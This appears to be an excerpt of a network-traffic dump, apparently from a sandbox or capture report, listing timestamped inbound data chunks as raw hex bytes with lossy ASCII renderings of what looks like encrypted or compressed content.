                                                                                                  2021-11-24 13:16:13 UTC75INData Raw: e4 7c 52 9c 00 23 8e ca d9 de b4 ac d2 9c 41 88 bb e6 55 d2 ed 4a e4 7c dd 33 21 34 ab 1f 5e 8b 80 bc b6 c3 f1 07 9e 5f 87 5c 3f a2 19 d0 3f 0b 28 ed eb 5e 49 28 a1 be 5d 8e 97 c1 6e 85 05 bb 59 da a1 38 c1 be 47 0c 2a 73 4f 22 38 7e 5c 69 33 ba 7a 7c 33 a9 e9 f1 d6 63 33 7e 2b 5e a5 53 8e b2 8e 9a cb 78 c9 00 c1 2a d0 b2 e6 3a 2c 44 65 e3 33 bd 7b 1c 6f d9 e6 87 6d d3 e8 31 e7 24 1a 13 e6 1c c5 af 47 23 57 e6 f9 60 0c 8c 32 ad f9 8f 3e 36 c3 ca c5 ab 6e 06 12 e2 8e 8b 4c 68 99 9f da d6 f2 e4 6a c0 5e 3a eb 6a 2a a7 37 7f 46 56 fa 9f 62 ea 7a ad b8 c9 14 c3 bd 17 24 63 4f 10 37 40 31 25 6b 12 ce 07 ef 1b 8f 1b f4 86 0f d5 37 34 81 11 e7 ab 10 bf eb 39 5d 07 4c 0c 8f 8b 23 4e 0f 69 e2 f7 6d 24 80 77 8e 78 12 55 76 4a c9 3e 3e da 07 fc 18 bb d3 a4 e6 ba d5
                                                                                                  Data Ascii: |R#AUJ|3!4^_\??(^I(]nY8G*sO"8~\i3z|3c3~+^Sx*:,De3{om1$G#W`2>6nLhj^:j*7FVbz$cO7@1%k749]L#Nim$wxUvJ>>
                                                                                                  2021-11-24 13:16:13 UTC76INData Raw: 12 39 2c 91 5c c3 77 dc 5f 45 4d e1 7a 07 5b cf c6 0f 09 f6 b9 ea c1 72 72 c4 c3 03 a9 d1 55 e6 23 8e e4 3d 7e e6 e4 00 68 2f 9b 45 00 85 09 4c 9c 87 36 6a ae 4c 91 63 88 2c 3a 00 01 82 e7 ca 06 2d 4c 62 c3 0d 4c e8 70 2d 3b a3 0d 3b 6e eb c3 a0 1d 90 6f f9 9e c7 1c 2d 7a 03 9f bc 76 4f 0e 1d 4a d0 b1 50 2e ff a1 59 22 de b8 a6 02 73 c4 76 34 12 c3 bc c5 33 bd 80 ee 29 f9 de ca 92 e0 f9 d0 d3 fc 52 74 46 53 cd 58 bc 7d 15 b4 af 9f ad 48 8d 92 68 1a 05 b8 75 c0 2e de 79 04 36 e1 8e 63 48 82 bb 63 1b 84 25 21 66 c4 dc 03 40 9f 44 b8 bb b1 97 bb b7 6f 8c c2 4d a5 ee 49 8c dd ac 49 23 7b f7 96 bb 19 3a fb 12 cf ee cb 4d dc 5d 26 75 d4 36 7d 93 c8 9e a2 2f 2b 9a fe 39 f5 43 c9 f1 d7 b9 78 cf 45 3e a1 5f a6 9a 54 ad 8d 10 8c ef 1e 94 69 e1 14 85 fa 51 dd ba 4d
                                                                                                  Data Ascii: 9,\w_EMz[rrU#=~h/EL6jLc,:-LbLp-;;no-zvOJP.Y"sv43)RtFSX}Hhu.y6cHc%!f@DoMII#{:M]&u6}/+9CxE>_TiQM
                                                                                                  2021-11-24 13:16:13 UTC77INData Raw: 66 76 14 4d 8c ca cc b5 28 b1 de e4 ea 5d c6 ad f6 42 f2 61 45 75 af c6 1f 46 3c fd 3d d4 2b 4f f3 e5 e2 d9 64 3a 6b f6 7f 02 54 4c 34 d3 bd b8 79 01 cb 10 64 a5 af 02 28 17 ef c3 86 63 91 8f ed 65 0f 92 fa e3 08 87 0b 22 e6 09 93 1b 89 f9 07 6e f8 c1 ad 4a c0 f0 85 dd 11 84 d4 3e 88 c9 6f 29 39 87 82 b7 b6 a0 fd 98 e4 20 6c 84 5c 7b 5a 00 5d ce 06 f3 8d 25 85 27 6f 03 85 1a 1a 4c bf 69 2f ed 64 97 72 c7 59 b9 10 87 2b 09 37 67 2f bf 06 b2 62 64 9d 1e 58 60 36 31 6e b2 13 95 12 f1 4e f6 e0 7f cc 8e 3a 20 05 15 33 0f 36 ce 84 4a 5f 69 29 04 e9 10 ed 0f 85 7b 9a af 32 a4 03 55 b0 3f 28 71 4d 9c ca 76 c4 58 a0 73 f0 47 85 20 7f bd 4d 38 a9 1d 24 b8 22 92 0a 58 4a ab 7c 3e 55 23 8e b7 b4 aa d8 06 af 3f 27 36 c4 69 f6 43 55 df 7f 56 95 64 dc db 3e 29 eb 56 66
                                                                                                  Data Ascii: fvM(]BaEuF<=+Od:kTL4yd(ce"nJ>o)9 l\{Z]%'oLi/drY+7g/bdX`61nN: 36J_i){2U?(qMvXsG M8$"XJ|>U#?'6iCUVd>)Vf
                                                                                                  2021-11-24 13:16:13 UTC79INData Raw: d5 93 df cf 3f 87 fd aa 4f f4 20 dc 8c eb 6c 29 3f fc 6d b4 50 8c f9 2a ce 69 5a ef a2 69 8d 28 c9 93 52 ef 3e 90 57 26 dd 90 4f 34 2c ec ce 87 39 5e 0a ed 62 f7 1a 31 5d 8b f9 5f ec 98 ad e2 a6 b6 27 95 0a 01 f5 83 7a 24 ab 77 9a 39 92 fa 42 d6 98 55 2a f5 55 e5 a5 08 40 e1 c2 0c e5 be da 6b b9 2c f8 69 f9 83 83 a0 16 49 ec d9 16 9a c2 14 d0 cf 23 41 e8 60 9e dc 71 d5 c4 8e 58 56 96 bb 12 46 19 48 62 28 19 83 33 71 d7 1d 52 79 9c ba fd 8b 61 12 95 69 13 b3 9d 7e f8 4f 83 42 00 d4 73 5e 15 bf 62 36 16 42 3f 74 22 19 94 a3 76 8f 48 81 1f be 9b 09 0e 8f 4b b1 15 50 f3 4a 96 bf 84 46 70 89 1e c0 35 40 f2 08 e7 77 bb 81 e0 b9 99 34 e5 fe 60 c9 bb 1f 13 f6 c5 62 42 cc 8f 77 54 5b 30 c5 de ed 52 e0 31 33 54 94 ce 04 5f d0 ca eb 85 b4 89 f3 29 c1 a0 67 2a f4 70
                                                                                                  Data Ascii: ?O l)?mP*iZi(R>W&O4,9^b1]_'z$w9BU*U@k,iI#A`qXVFHb(3qRyai~OBs^b6B?t"vHKPJFp5@w4`bBwT[0R13T_)g*p
                                                                                                  2021-11-24 13:16:13 UTC80INData Raw: 73 49 81 0e 10 39 ba cd e6 a3 2e 58 33 0d 65 fb 62 54 43 81 b0 99 29 b6 9b b1 4b 7e 2c 31 3e bc 6f 29 b0 a2 b7 75 e6 3a ec 3a 2f 07 46 08 8b de 83 00 ac 8b 19 74 23 2b 0d b8 64 a6 c2 01 f9 07 f6 ad c5 29 0f 96 6d 69 3e 66 65 cf d5 23 9d 8a 12 f3 0d 25 19 91 14 92 e2 7c db dd 0b 07 dd 44 0c d7 fe 0c 69 7d 78 9c 18 5c 21 ee 53 8a 01 d0 76 18 e7 31 2b 96 8a 28 c4 8c 17 ac 05 e3 56 76 6e 58 63 1b d0 13 fc df ea ca af 21 4e c1 6d cb c7 5c 78 a1 00 50 b3 8d 21 2a 37 d7 5b d3 4e 9e 7e ab 85 cc 42 ae 57 44 27 d2 7f 8a 48 e0 93 85 cf 69 40 ba 19 55 e9 33 f4 15 37 1b aa f9 3d ed 92 de 4f 5e 87 63 93 1f bb 57 2b 6e bc db 26 38 d2 45 92 69 79 1d 18 09 6d 07 1a 4d 9c ea c1 f4 a5 f3 f0 ca 97 02 7a 98 e8 1c 65 5e ff 68 4d 7c 60 e1 95 cc ca ef 17 d6 6d cd 04 30 b3 9d e3
                                                                                                  Data Ascii: sI9.X3ebTC)K~,1>o)u::/Ft#+d)mi>fe#%|Di}x\!Sv1+(VvnXc!Nm\xP!*7[N~BWD'Hi@U37=O^cW+n&8EiymMze^hM|`m0
                                                                                                  2021-11-24 13:16:13 UTC81INData Raw: 55 c3 03 95 55 7e 94 4c 69 c7 c4 2e 19 d2 49 3b 63 9e bd ca 4a 01 16 13 75 4f e6 bf 98 e7 7f ce 01 46 ab fc b6 55 78 41 37 f4 a1 3a 43 26 0a 3e fd 6d ea 60 de ba 19 c3 b1 d7 c3 fd 3c a5 9e 2c 3b 8b c5 c1 a3 c8 f0 e5 2c a1 5e d7 06 d3 99 e7 c7 9f 23 20 ba fc ac 58 3b d6 c0 eb e5 65 fe 95 6b 4d fa c8 9b ce a6 6f 6e 97 97 db c8 25 7e e3 52 80 ac ab 80 37 43 b0 72 97 b8 1d 3f 29 06 b4 bd 73 21 1b 87 46 86 28 e6 31 ea 67 65 ab 82 10 9e b9 f8 8a b3 9e a3 6c 41 e1 4f ac f3 83 47 5c 2f 6f 2e 9e b4 cf 2f 97 0f 17 74 c7 23 b8 ca 33 fe ae a0 67 1c 1b 85 01 2b c4 43 13 24 21 91 99 8b 5a c4 d6 c5 b0 a6 64 9c 52 40 c6 a9 1f e2 fa 0f 75 f3 b3 a4 ff 61 80 ff ec d3 b5 e0 74 4e af de 10 d5 cb 4a c3 be e8 8c 02 43 df 6f 6f 22 43 56 3d f2 24 8a 3d 74 ba 2c f1 25 79 05 a2 a7
                                                                                                  Data Ascii: UU~Li.I;cJuOFUxA7:C&>m`<,;,^# X;ekMon%~R7Cr?)s!F(1gelAOG\/o./t#3g+C$!ZdR@uatNJCoo"CV=$=t,%y
                                                                                                  2021-11-24 13:16:13 UTC82INData Raw: 11 6c 8a 3d a5 84 0a bd 36 e1 fc da fb fc 80 ab 21 1f ab 09 cd 1b 88 85 30 b8 79 9d 3c 8e ac 51 b5 d8 3a 1a 1a 53 9a ef 99 ee b2 29 c9 e2 ee 64 47 0f 31 ba 65 50 bb 0e 63 23 7d ae b8 89 d4 c0 24 04 aa bb 73 b1 a3 95 37 68 c6 8e 89 2d 5b 0c 1c 2d 31 ed bd 4d 9e 11 c4 f4 93 22 93 d0 50 ea 79 3a 63 f3 5a 11 4a 69 6b 7d e9 35 be df fb 71 3b 0f 4f c9 ac 29 57 6d 27 52 e2 40 61 dc b3 2a a8 11 6c b1 40 47 1e fd cf 4e 3a 26 22 bf cd ae 22 31 56 0d df 4f 1b cb be f8 b6 e4 08 d2 4f fb 83 a8 97 0a 77 32 79 71 98 d9 63 e2 12 be d0 4c 82 66 7a 71 e1 ea b5 5a bd f8 f3 2a 48 a1 1d 70 45 ac 92 b4 70 7c d1 78 05 d9 3d 83 f5 d3 a6 04 47 d8 bb f6 08 ee 18 33 73 61 63 3f 45 ae d0 e9 34 5d 87 ab 49 41 40 33 7a 63 b2 b0 50 94 56 40 47 07 3c 47 61 ad 04 be e4 d7 ea 52 14 2a 8f
                                                                                                  Data Ascii: l=6!0y<Q:S)dG1ePc#}$s7h-[-1M"Py:cZJik}5q;O)Wm'R@a*l@GN:&""1VOOw2yqcLfzqZ*HpEp|x=G3sac?E4]IA@3zcPV@G<GaR*
                                                                                                  2021-11-24 13:16:13 UTC83INData Raw: 6e 96 d5 e8 73 a5 81 4e 02 a5 e4 90 61 8b e5 02 8d fd 70 f3 5d 2c a3 07 73 de a4 98 36 06 52 0f 14 10 33 9c 68 55 c3 72 c2 34 cd 18 c3 4a 74 1c 6f 5b 3c dc e0 31 ba 8f 1e a9 17 e2 90 59 16 1a c9 f1 9f f7 a5 2a 9c 13 6b 92 21 12 56 54 90 57 16 c0 34 7d d4 17 3c 27 a9 8a 11 94 b9 6e 4f 63 70 da d4 81 f0 4c ec b5 48 81 2d 8c 7f fe 1c a7 47 b3 29 e1 0b 82 ee 33 cb 67 de 34 21 7f 92 16 2d eb a9 cd 60 20 61 ef cb fe 9c a2 70 88 a4 52 6b bf 60 3b d4 34 c9 d7 fd 2d 7c 86 35 4c b8 76 53 95 86 41 6e ff e7 37 d4 af 6e 7c fc e6 10 33 af e1 f4 67 b9 e0 fc d3 80 22 98 f0 63 e1 b8 75 c6 2a c4 7f ea 80 62 65 7b 16 a0 db b7 95 c9 0c 79 fe 47 17 35 d4 33 f0 2f 84 85 94 14 6b 56 4e 60 df 4e e2 b2 0a a6 da 9e 39 6d 38 da 3c a0 a7 1f 4e 23 7c a5 51 f8 a4 0a 6d 50 d4 be fc fd
                                                                                                  Data Ascii: nsNap],s6R3hUr4Jto[<1Y*k!VTW4}<'nOcpLH-G)3g4!-` apRk`;4-|5LvSAn7n|3g"cu*be{yG53/kVN`N9m8<N#|QmP
                                                                                                  2021-11-24 13:16:13 UTC84INData Raw: df 63 36 e1 ab 74 f1 c7 66 7e 02 ce b1 77 8b 7e 31 96 0a 58 3d 5f f4 c1 77 e0 ed 5c ac ce 54 3c 9c 0d 2a 0e b1 1b 9a e5 b9 a6 35 52 3a c4 a0 ab 43 1a 0a 3b 91 5c 16 ae 6d c1 f8 9f 70 bb c5 93 ce d6 ad 6f c6 11 a5 74 a6 39 f1 d8 35 57 d8 6c 8f dc 92 07 89 3e 5e 1c 2b f5 a8 d8 6c 29 c3 4c e6 78 fa 94 32 4a 4e 53 6f a1 97 bf e0 5e 61 16 d6 ca 18 ed 2d 98 5d ac f8 30 e5 7f 7f 70 3b c9 00 bc 40 87 3c 52 ba 3a 98 85 cc c3 6c e5 5f 39 5b 0e d9 12 94 c8 37 49 10 ee 80 90 3e e7 36 13 70 66 4f 56 2e 3e fb 5a fe df c4 1e cd ac 69 86 79 61 0c d3 31 fb 68 01 12 0a 31 b5 68 ca 07 97 66 19 58 99 8a c8 45 8a 7a 53 ad 74 f9 06 c7 1f eb 1e d1 b0 f2 9a fb 16 d6 f0 be ae ee ee 7e e2 d9 35 1b e2 99 a8 aa bf 5f b8 9c 93 f2 f3 21 cc 03 7f 5f 16 0b c6 92 20 81 4f 46 ce d6 b4 0f
                                                                                                  Data Ascii: c6tf~w~1X=_w\T<*5R:C;\mpot95Wl>^+l)Lx2JNSo^a-]0p;@<R:l_9[7I>6pfOV.>Ziya1h1hfXEzSt~5_!_ OF
                                                                                                  2021-11-24 13:16:13 UTC86INData Raw: 07 9b 49 95 da 3f ed 2b 75 f1 65 61 3b 63 8a 4a c5 e6 13 57 b0 55 c0 53 8e 88 d4 ea 3a 89 4b d6 9d cb 7e e6 6e 16 ed c9 5f cd 57 2b b2 c5 a0 32 d8 68 55 62 b0 c8 fa e0 e2 43 57 44 67 26 23 8a bf e3 16 06 16 cd f4 11 0a 10 52 f8 8d 08 53 3a a8 b3 d5 4b 87 6b 45 b8 0c 6e a7 06 34 d5 21 63 1f 15 5c 9f 79 e4 40 e5 b6 e5 47 22 6d ae 5f 21 24 c3 dd 54 5a 0e 16 12 28 75 02 0a 05 64 6a 24 d7 32 b4 df 66 e0 46 7a 21 46 5d a6 e2 3c 30 fc 4b 5b 84 6c 1d 29 07 77 6c 96 56 72 c0 9f 81 dc 67 c6 38 29 db 9c 92 a7 7c ee f3 4c fb 18 3a 27 10 ca 64 ea 49 c7 b9 f3 be 50 fb 8a d9 53 a4 c3 23 5b 78 72 40 26 7b 9e af c5 64 fc 1c 5b 24 37 73 25 7c 7f 7e f2 74 0c af 29 3e 45 3e 36 e8 43 db d7 33 16 f9 34 65 5a a7 bd 0d 58 3a a2 28 e8 20 b2 fb a3 a6 d4 74 5e ec ac 90 c2 93 40 4f
                                                                                                  Data Ascii: I?+uea;cJWUS:K~n_W+2hUbCWDg&#RS:KkEn4!c\y@G"m_!$TZ(udj$2fFz!F]<0K[l)wlVrg8)|L:'dIPS#[xr@&{d[$7s%|~t)>E>6C34eZX:( t^@O
                                                                                                  2021-11-24 13:16:13 UTC87INData Raw: d2 c3 6a 4f b6 ec c9 89 e3 f5 44 cb 64 47 ed f3 d7 62 ce c8 e2 7f 67 48 f2 74 97 18 54 39 81 7b 70 ee f6 38 26 7a 57 eb e5 8e 6a c8 11 2b 44 a1 c9 f5 2f 95 a9 59 aa de b7 0a 87 fd 68 72 08 81 15 83 6d 16 1f a2 86 a9 44 51 55 8f 83 fa 7f 5f e0 16 a6 0c a1 9a 50 da 37 e3 dc 39 c5 fd e8 5b e8 e3 6a 09 3e c5 d7 c6 b2 c3 3e ed 75 78 1b 9f 72 06 2e eb 02 a3 b3 37 2d a8 ff db f6 01 82 78 5b 65 ba 42 02 b7 bb 43 45 f6 47 7f 32 32 e4 63 ff 79 fc 1e 50 d1 db c6 33 c2 11 8b 23 36 04 c0 ee 37 d4 da 76 d1 6b 9c 96 8a 1b aa 33 54 67 26 03 ab d8 c9 07 43 1c 96 4b cb 4a b8 4c c2 fd 85 c5 31 d6 ef 2b 3a ee 89 fc 74 2e d3 a1 f1 3c cc 6b 8c 9b 2a 13 a8 17 59 28 3a 25 f0 11 d0 14 3d 80 0d 90 ec 6e 81 bb 10 71 a4 e5 69 78 7e 66 37 b5 25 ca 92 ae 80 08 4c 72 83 09 f1 dc 22 c6
                                                                                                  Data Ascii: jODdGbgHtT9{p8&zWj+D/YhrmDQU_P79[j>>uxr.7-x[eBCEG22cyP3#67vk3Tg&CKJL1+:t.<k*Y(:%=nqix~f7%Lr"
                                                                                                  2021-11-24 13:16:13 UTC88INData Raw: 52 58 b6 8a db 7c 77 4d b0 0c eb 07 5f 45 a5 a6 74 34 22 7e 80 7e b5 62 7c 52 73 f1 22 c7 10 c4 ef f1 2a bb a9 bb ce 48 19 68 c6 4a d8 2b 7b 6b c9 0f 1a d0 38 b2 63 6c 59 d6 a4 90 e7 66 79 35 b6 24 64 a3 f5 24 4d 03 04 a8 68 83 e6 7c 65 ad c6 6b 7c 04 b1 58 1e 14 9e 04 61 ed c9 92 16 c2 aa 0e 94 ec 95 29 fb 44 2d e7 4a ee e2 e6 28 46 29 4b f0 87 4a 09 15 fe df ee c4 b4 e2 8f 44 d1 61 5c 24 82 be a5 b4 b9 2c 60 9f 97 ac 30 f8 74 e6 ff 86 b5 68 e3 f4 91 fc 5a 43 df 52 49 a9 11 c0 bc 97 e1 b4 ab 7d ad 8e a4 38 73 c1 77 1a 50 84 53 46 95 29 2f 4b ac 6d 72 3d 4e 3a f7 4c 5e d2 4c b3 1d 2d 24 9e b2 91 d4 be 92 1d dc ef 25 5d f6 4d c6 3e 13 9b 2c 75 9d 09 66 42 26 92 fa 4f 5b 72 86 96 5f bf d6 9c 0b 1b c6 a5 eb b1 5a 20 20 55 aa 84 a2 96 8c f5 05 90 c6 8c db e0
                                                                                                  Data Ascii: RX|wM_Et4"~~b|Rs"*HhJ+{k8clYfy5$d$Mh|ek|Xa)D-J(F)KJDa\$,`0thZCRI}8swPSF)/Kmr=N:L^L-$%]M>,ufB&O[r_Z U
                                                                                                  2021-11-24 13:16:13 UTC90INData Raw: ca e0 86 8e bd ad 5e 7a bc 14 b5 d5 58 05 23 54 3d b3 46 f2 de ba 2a c5 e2 ec d8 03 23 a2 6e 8f 4d cf 8b ad 64 31 62 d5 bc 82 ef 4c 4c bc 04 08 20 08 1d d2 83 1f 1e 4e 0a b7 d1 69 9d 44 b0 86 6b 3d 7e 71 11 43 e1 4c 61 5e a6 fc 56 d7 f2 5f d6 5e 95 1f f7 47 48 f5 70 be e5 07 bb 5b c8 9d 23 95 a3 0a bc 3b 3f 77 b8 c8 b2 68 b4 52 15 a2 e8 55 b2 ab 8c 9b 85 1a 3b 5a b7 60 4a 28 83 0e 4d c1 cd 18 00 a9 b2 3b b3 84 56 f8 13 08 a8 fa 1c 4f aa 96 58 6e e9 15 1a 8d fe 3b 08 8d 38 9c 69 bf 4d 31 58 36 be ae 04 f1 c9 8b 79 e6 9f 13 07 fb a1 0c 52 07 f9 ef 15 f9 cc 80 af d6 1a c1 5e 59 7a 93 fd 04 42 0f a7 06 13 5d 44 ba 53 3f 83 11 34 cd 29 20 9c 40 96 d5 ec ab 2a 20 d1 7f 6c 4f 6a 14 d5 58 a3 ce 78 a9 e2 e1 42 55 7f c9 bb f1 f6 00 91 5f 46 f6 2e f5 9f 33 b6 c0 3b
                                                                                                  Data Ascii: ^zX#T=F*#nMd1bLL NiDk=~qCLa^V_^GHp[#;?whRU;Z`J(M;VOXn;8iM1X6yR^YzB]DS?4) @* lOjXxBU_F.3;
                                                                                                  2021-11-24 13:16:13 UTC91INData Raw: b2 a7 ea 5b 1a 3e c6 89 41 1f 99 c4 67 2f 50 b4 09 80 7d 3d b3 9b fb db ea 95 ab 2c bf d5 19 c5 6d 2c e9 f6 22 aa 1c 52 e4 7e ac 59 c4 98 01 56 ec 29 cc 18 93 18 1c b5 d6 ae 60 5d 98 d1 49 3d bd ca 83 fb 9c 30 3b f8 e5 cb 7e 4a ce 6d 0d f9 d1 40 4a 60 9b 4e ac 05 e3 fd ac 27 3b 47 b6 01 77 72 1e b9 5d 31 a1 ce 9d ae dd bf 89 39 b3 fa 2b b8 d6 5c 5d 12 93 a3 0f d3 db 51 a4 d1 23 a3 d6 0d 16 c5 23 ea a4 e4 b4 77 dd 10 7d d5 82 5c 16 83 59 b2 4d c1 9d 2a f9 f0 04 e3 53 7f 69 bc 9e 13 4f 70 d1 89 e0 e3 ff 57 d7 a1 65 55 9c e0 a6 cb 49 47 2b 9c 8d 93 66 60 07 2f e6 65 89 0e 1a 49 4f 3c 5b 66 be 3e 8d dc 59 9d 5f 05 06 2c 98 97 79 cf 1f 0c 72 9e 5e a8 8b da d0 41 ae ab 5c 24 24 51 8e 3b 62 ed b6 d7 d2 b2 75 5d 54 c4 7e 31 d2 0c c7 6d 52 6f 92 79 db 39 52 56 a7
                                                                                                  Data Ascii: [>Ag/P}=,m,"R~YV)`]I=0;~Jm@J`N';Gwr]19+\]Q##w}\YM*SiOpWeUIG+f`/eIO<[f>Y_,yr^A\$$Q;bu]T~1mRoy9RV
                                                                                                  2021-11-24 13:16:13 UTC92INData Raw: 37 91 f3 32 87 1d f5 0a d5 b4 a5 85 3f ab 4c 9c 9d 00 ed b4 87 3b 74 bf 7b 8b 46 03 1a 2d ac 2b a4 12 7d 55 d5 be 2f e6 97 49 a7 64 dd a0 e0 29 9f ae 9e 7b 38 4c 14 b9 c5 c2 57 7f e1 73 bb ff b3 75 16 26 f9 a3 61 ef bc 1e d3 0c 3a 98 21 49 e4 c0 55 1b 09 15 d1 12 8d 85 93 72 44 31 1b 7e 04 65 68 fe 78 b0 1b df f6 dc a1 64 ad d5 c1 69 c8 79 b2 14 6d 58 fb de 40 df c8 aa 67 1f 40 63 7c 0b a6 fc dd 11 e8 65 94 02 01 9c 4d 3b 15 b6 0c cd 16 7d 2d db 6d 86 d0 92 db 2c 43 01 ab 9e 1e de e3 4c 46 5f a6 21 c3 f4 fc d1 8e c2 f5 9c 86 5d 27 06 28 26 4d 29 05 b1 23 98 80 67 fa 4c f0 4f 0e 32 98 a8 4a 21 8e e3 0a 55 32 85 7b 29 c9 c9 ea 66 04 cc 81 9f a0 b8 44 12 83 5c 3a 7a c4 43 49 75 72 c8 d4 7d f1 d9 e4 02 06 32 03 37 bc 8c c5 02 6f f3 bb b9 aa 65 82 f9 92 6b 51
                                                                                                  Data Ascii: 72?L;t{F-+}U/Id){8LWsu&a:!IUrD1~ehxdiymX@g@c|eM;}-m,CLF_!]'(&M)#gLO2J!U2{)fD\:zCIur}27oekQ
                                                                                                  2021-11-24 13:16:13 UTC93INData Raw: 22 19 94 4c 4b bd de bc cf 8a 02 2b 5c bf 44 80 81 79 c3 4a 6c ba 14 88 2f 60 4d 4e 71 63 d8 94 b9 bd cc 44 fb 9f 22 b7 00 b2 d8 fe 8f b0 1e 1f aa 89 e5 b7 d7 dc 43 5b c1 ad c1 54 74 c7 56 28 96 9a 35 9f e9 62 27 e4 5d 51 d8 ee 55 6d d3 10 db 3c 39 56 b1 ad 8c 47 7d 51 ad f8 9b 0b 8f 16 64 da 29 ff 3b 8a 4e b1 fd b4 b7 50 57 26 ca 81 af 2a f2 4d 2a b8 44 49 95 1a 1f 78 48 cb c4 7f 28 77 25 3c d6 14 af f0 8b 4a b7 46 d5 48 98 48 14 19 a2 21 2f 98 7e 50 5c 72 74 eb 3f 4e 1e 95 bc 39 72 27 bf 7c 7e 9f 17 1e 7a 11 25 37 6c 83 17 03 7d 28 48 2d 45 11 b7 b4 5f 7b 84 19 36 be ac 82 da fc 01 0f ce 8e d2 94 8a ed 21 dc a1 23 c9 99 3e 3c 56 30 f9 81 0f bf a5 0b 1b da a7 9b fc 7d 90 d7 6d 10 f4 a1 d3 08 02 87 ba 6d 2f fd 18 c7 4d fc 9b 5f 08 6a 3f 59 55 6e 33 03 f2
                                                                                                  Data Ascii: "LK+\DyJl/`MNqcD"C[TtV(5b']QUm<9VG}Qd);NPW&*M*DIxH(w%<JFHH!/~P\rt?N9r'|~z%7l}(H-E_{6!#><V0}mm/M_j?YUn3
                                                                                                  2021-11-24 13:16:13 UTC95INData Raw: 7c 79 dd 44 f0 f5 fd db 22 83 d8 05 51 c3 78 6c 43 b6 15 4a df 6d 19 4b f1 54 24 b8 e1 03 82 27 68 a4 e0 5a fd 65 f8 c3 17 6f 37 00 64 a3 91 70 f2 07 d6 b0 f0 e6 8b cc b2 50 2c 33 98 02 9c 15 c4 00 52 5b 59 4e d1 5f 5f 79 45 f7 91 98 a0 d7 93 90 0f d0 cf 5b b1 c2 ff eb 97 c9 fe c2 28 81 50 84 55 96 c6 3b 51 46 fb 64 46 78 67 05 38 8f de a2 16 45 ee ff a8 dc 8b cd 25 8b a8 a6 a3 63 26 51 de b8 25 f9 bc a4 5f eb 28 8a f1 1e 67 b8 37 a8 3d 1d 13 fd 84 e7 06 f1 dc a7 f5 30 79 92 9b 69 03 95 e8 d0 be 49 2e 61 b5 87 53 70 94 68 58 19 ea b6 f1 7d 44 ef e4 0c a3 9f 63 05 7d ad 3c 34 d4 56 b4 63 f2 43 b2 5d 62 32 39 c1 29 c4 ec c7 ac 36 de 85 57 b8 27 e8 8b b5 43 2b 7d 14 36 4e cf e4 b0 b4 76 00 4f c0 b0 0d a3 6b 2f 12 3a 08 e5 85 75 48 8f 83 58 80 1c de fb 30 65
                                                                                                  Data Ascii: |yD"QxlCJmKT$'hZeo7dpP,3R[YN__yE[(PU;QFdFxg8E%c&Q%_(g7=0yiI.aSphX}Dc}<4VcC]b29)6W'C+}6NvOk/:uHX0e
                                                                                                  2021-11-24 13:16:13 UTC96INData Raw: 55 d7 63 46 8f bd c7 1c 72 83 e1 3b 89 b1 4d 6f 4a e3 34 af 8b 67 28 a7 bc 58 41 4c 06 3d 0c 20 df 3d 9b 55 2f 65 66 b5 64 fc fb 10 b5 bf 9d d7 fe 35 80 0b dd 18 c8 a2 ed 3f 38 5e 21 10 64 ba a4 18 df 30 cf 22 f9 08 a2 9b c4 5b 05 44 f5 87 9e f7 58 51 e8 bb b9 8c ca 99 72 43 cd 1d 9a 39 f4 fd b4 a4 08 d9 15 e6 fa 96 01 6d 91 18 25 23 81 bb 2b 26 31 01 68 0c cc 42 6e b5 7f db 04 8b 81 39 aa a4 2b 85 58 93 d8 cb bf 9e 6c e6 1d 30 3a 47 37 ab 23 77 de 48 5a 02 69 f9 7b 4c c4 b4 09 89 8e 93 c2 e0 c8 2d c3 cd 45 a2 51 1b 03 aa ea 8a f7 29 c8 67 d0 79 6c 7c 5b 16 67 c6 1b 6a 2a 9a 16 ef af c1 f2 d8 62 39 d2 e2 d6 d4 e3 38 cd 3a 3f 02 75 29 25 9e 40 bf a5 9c b5 9e 1b 7e 6f 5d 1f d2 ea ee df 8d 35 4c a8 7f 03 f1 30 99 37 43 45 0d 0d 2c bd e5 b0 68 b8 e1 3c 21 4b
                                                                                                  Data Ascii: UcFr;MoJ4g(XAL= =U/efd5?8^!d0"[DXQrC9m%#+&1hBn9+Xl0:G7#wHZi{L-EQ)gyl|[gj*b98:?u)%@~o]5L07CE,h<!K
                                                                                                  2021-11-24 13:16:13 UTC97INData Raw: 84 23 c5 dd 8c 6f 14 6d e6 3d 46 3c 67 5e bc c7 71 42 aa 97 9e a7 41 dd 69 18 0c 3b 40 7b 9c fd 4b f2 23 4f f9 19 93 e4 5a 1e e1 05 6b 50 e8 87 46 01 5b bf 20 ea 1b 1b c8 83 96 4f 21 49 e5 49 1b dc f7 9b ba cc 80 8d 8e 40 40 25 cf e8 9c a7 82 ad ff 71 d1 e4 c7 28 0c f3 d7 54 af 97 04 54 e5 8e 3f 63 59 23 89 26 cd 12 6c 2e 80 c5 84 d3 4c 72 84 63 9d 73 4f d3 98 b5 ec b5 e6 d6 d5 25 bc 99 fa 0e 10 68 7f 3a 16 9c db d5 eb 33 0d cf 0b 92 d8 fb 51 ab 7c 6e a8 9e a0 74 80 3e 2a ba b2 e2 51 12 3b fd 61 86 3b a4 bd 44 ae 78 a5 8c 73 c3 f0 7d 01 3c c6 bf da 45 0d 77 93 12 94 c5 30 c6 02 65 a5 9e cc b6 b9 34 9f 68 dd 70 1c 45 a8 7a 89 19 d9 08 e6 fd 24 53 b5 99 0e 77 e6 99 d2 b9 d4 16 30 45 d1 af 41 87 1f fa 33 24 33 6c a2 b4 49 eb 9c 1d 46 f8 a6 f3 d5 9d c5 64 f6
                                                                                                  Data Ascii: #om=F<g^qBAi;@{K#OZkPF[ O!II@@%q(TT?cY#&l.LrcsO%h:3Q|nt>*Q;a;Dxs}<Ew0e4hpEz$Sw0EA3$3lIFd
